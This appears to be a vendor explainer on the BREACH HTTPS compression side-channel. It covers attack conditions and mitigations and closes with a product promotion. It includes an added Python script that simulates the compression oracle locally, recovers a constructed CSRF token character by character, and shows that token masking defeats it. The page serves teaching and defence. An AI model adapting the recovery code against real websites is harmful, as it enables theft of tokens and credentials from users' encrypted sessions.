BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) was disclosed in 2013. It is not a data breach in itself but a side-channel attack that exploits the combination of HTTP compression and TLS encryption that websites use to accelerate page load times, conserve bandwidth and secure data during transmission. BREACH does not break SSL/TLS: the cipher stays intact, but the length of a compressed response depends on its content, and that length is visible to anyone watching the encrypted traffic. By combining brute-force guessing with divide-and-conquer narrowing of the candidate set, an attacker can use BREACH to extract anti-CSRF tokens, login credentials, email addresses and other sensitive, personally identifiable information from SSL-enabled websites.
BREACH Attack: Conditions for Vulnerability and Possible Mitigation Techniques
The BREACH attack is agnostic to the version of SSL/TLS in use and works against any cipher suite, as long as the following conditions are met:
- The web application is served with HTTP-level compression (gzip or deflate Content-Encoding) and reflects user-supplied input in the same response body that contains a static secret, such as an anti-CSRF token.
- The attacker knows what to search for (a prefix or the markup surrounding the secret) and is able to observe the encrypted traffic between the user and the web application in order to recover the length of each HTTP response.
- The attacker is able to make the user's browser issue requests to the target website with attacker-chosen parameters, for example by persuading the user to visit a page whose script or image tags request the target URL; no browser compromise is required, since the browser attaches the user's cookies to those requests automatically.
In effect, by injecting a guess into a request that the server reflects next to the secret, and observing the length of the compressed HTTPS response, an attacker learns whether the guess extended a match with the secret; repeating this one character at a time recovers the plaintext secret from the encrypted stream.
Requiring only a few thousand requests, the BREACH attack completes in well under a minute, and no clean, general way to eliminate it exists. Possible mitigations include disabling HTTP compression, which results in reduced performance and increased bandwidth usage; separating secrets from user input, for instance by serving secrets only from responses that reflect nothing; randomizing or masking secrets per request so that the bytes an attacker tries to match never repeat; adding random padding to hide response lengths; and rate-limiting requests to the server. Most BREACH mitigations are application-specific or require better information security practices for the handling of sensitive data. Other preventive measures include implementing vulnerability management on web applications and using a Web Application Firewall to detect and block malicious clients.
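The conditions above, the one-character-at-a-time recovery, and the masking mitigation can all be exercised locally. The following is an added example written for this page (it is not code from the BREACH authors or from Akamai). zlib stands in for the server's gzip encoding and the byte length of its output for the TLS record size an attacker would observe on the wire; nothing touches a network. The page layout, the token alphabet, the attacker's known prefix `csrf_token" value="` and the filler characters are assumptions for the demo. Scoring uses the "two tries" comparison from the BREACH paper, which places the candidate character before and after some filler so that a wrong guess yields identical compressed lengths and only a right guess shortens the response. The second server applies the paper's masking mitigation, sending mask || (mask XOR secret) with a fresh random mask in every response, so the same oracle has nothing stable to match while the origin still recovers the secret with `unmask`.

```python
# Added example (not from the original page): a local simulation of the BREACH
# compression oracle against a constructed response body, then the same oracle
# against a per-response masked token.  zlib stands in for gzip Content-Encoding
# and len() of its output for the TLS record length seen on the wire.
import secrets
import zlib

SECRET_TOKEN = "7e3a9f0c"              # constructed static anti-CSRF token (assumption)
PREFIX = 'csrf_token" value="'         # markup the attacker knows precedes the secret
ALPHABET = "0123456789abcdef" + '"'    # assumed token alphabet; '"' marks the end
FILLER = "{}|~^`[]"                    # chars absent from the page: never back-referenced


def page(reflected: str, token: str) -> bytes:
    """Constructed vulnerable body: reflects user input next to a secret."""
    return (
        '<html><body>'
        f'<form><input type="hidden" name="csrf_token" value="{token}"></form>'
        f'<p>You searched for: {reflected}</p>'
        '</body></html>'
    ).encode()


def observed_length(body: bytes) -> int:
    """The side channel: byte length of the compressed response."""
    return len(zlib.compress(body))


class StaticTokenServer:
    """Vulnerable origin: the same token bytes appear in every response."""
    def __init__(self, token: str):
        self.token, self.requests = token, 0

    def serve(self, q: str) -> bytes:
        self.requests += 1
        return page(q, self.token)


def mask_token(secret: str) -> str:
    """Mitigation: emit mask || (mask XOR secret) with a fresh random mask each time."""
    mask = secrets.token_bytes(len(secret))
    masked = bytes(a ^ b for a, b in zip(mask, secret.encode()))
    return mask.hex() + masked.hex()


def unmask(field: str) -> str:
    """Origin-side inverse of mask_token; the secret is recovered exactly."""
    half = len(field) // 2
    mask, masked = bytes.fromhex(field[:half]), bytes.fromhex(field[half:])
    return bytes(a ^ b for a, b in zip(mask, masked)).decode()


class MaskedTokenServer(StaticTokenServer):
    """Mitigated origin: the token bytes differ in every response."""
    def serve(self, q: str) -> bytes:
        self.requests += 1
        return page(q, mask_token(self.token))


def score(serve, known: str, candidate: str) -> int:
    """
    'Two tries' measurement from the BREACH paper: compare
        known + candidate + filler   (a right candidate extends the back-reference)
    against
        known + filler + candidate   (the candidate cannot extend it).
    A wrong candidate yields identical lengths, because both bodies contain the
    same bytes merely reordered outside any match; a right one compresses smaller.
    Summed over several filler lengths so a one-byte signal is not lost to the
    bit alignment of the compressed stream.
    """
    total = 0
    for n in range(1, len(FILLER) + 1):
        pad = FILLER[:n]
        total += (observed_length(serve(known + pad + candidate))
                  - observed_length(serve(known + candidate + pad)))
    return total


def recover(serve, prefix: str = PREFIX, max_len: int = 32) -> str:
    """Extend the guess one character at a time until the closing quote is found
    or no candidate produces a measurable signal."""
    known = prefix
    for _ in range(max_len):
        scores = {c: score(serve, known, c) for c in ALPHABET}
        best = max(scores, key=scores.get)
        if scores[best] <= 0 or best == '"':
            break
        known += best
    return known[len(prefix):]


if __name__ == "__main__":
    vulnerable = StaticTokenServer(SECRET_TOKEN)
    print("static token :", recover(vulnerable.serve), "after", vulnerable.requests, "requests")
    mitigated = MaskedTokenServer(SECRET_TOKEN)
    print("masked token :", repr(recover(mitigated.serve)), "(attack fails)")
    print("origin unmask:", unmask(mask_token(SECRET_TOKEN)))
```

Running the file prints the recovered token for the static server together with the request count, which lands in the "few thousand" range quoted above (17 candidates, 16 measurements each, one round per character), then the junk or empty string the same oracle produces against the masked server. Masking does not require disabling compression and costs nothing in bandwidth beyond the doubled token field; the trade-off is that the origin must unmask on every request, so it belongs in the application or framework rather than at the edge.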
A Simple, Powerful Way to Protect Your Web Sites and Applications
Akamai is ready to help our customers implement appropriate defenses and discuss the performance implications of possible defensive strategies against the BREACH attack. For users of our platform, we recommend the Kona Site Defender web security solution, which offers:
- Powerful, built-in DDoS mitigation that leverages the scalability of the Akamai Intelligent Platform to thwart DDoS attacks at both the application and network layers
- A Web Application Firewall enabling deep packet inspection of HTTP/S traffic in order to identify and protect against a SQL injection attack, cross-site scripting, and other common cyber attacks
- Rate controls that may help prevent application layer attacks by monitoring and controlling the rate of requests against our servers and the customer origin
Learn more about Kona Site Defender and other Cloud Security Solutions built on the Akamai Intelligent Platform.